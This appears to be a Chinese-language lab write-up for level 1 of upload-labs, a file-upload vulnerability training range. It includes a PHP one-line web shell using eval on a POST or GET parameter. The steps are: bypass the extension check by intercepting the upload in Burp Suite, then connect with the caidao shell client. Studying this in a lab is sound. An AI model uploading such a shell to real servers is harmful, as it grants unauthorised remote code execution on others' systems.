upload-labs第一关

首先，打开靶场，进入第一关

在这里插入图片描述

然后先上传一个正常的图片，测试一下靶场安装是否正常

在这里插入图片描述

那再上传一个php文件试试。提示不行，只能上传jpg、png、gif类型的文件，说明这一关考的是限制文件上传的类型

在这里插入图片描述

那就用php（用其他语言写也行）写个一句话木马，然后将文件后缀改为png之类的

<?php
eval($_POST['123']);
//或者
eval($_GET['123']);
//123是密码，等下会用到，随便取什么值都行
?>

在这里插入图片描述

点上传文件之前，先给浏览器设置个代理服务器

在这里插入图片描述

然后在burp suite里抓包

在这里插入图片描述

把文件后缀从png改回php，再发送给服务器

在这里插入图片描述

右击刚刚上传的图片，啥都看不到是正常的

在这里插入图片描述

选择属性，找到刚刚上传的图片路径地址

在这里插入图片描述

在这里插入图片描述

在菜刀里找个空白的地方，右击鼠标，选择添加

在这里插入图片描述

在这里插入图片描述

添加好了之后，就会在第一行出现记录

在这里插入图片描述

点击它，就能连接后台了

在这里插入图片描述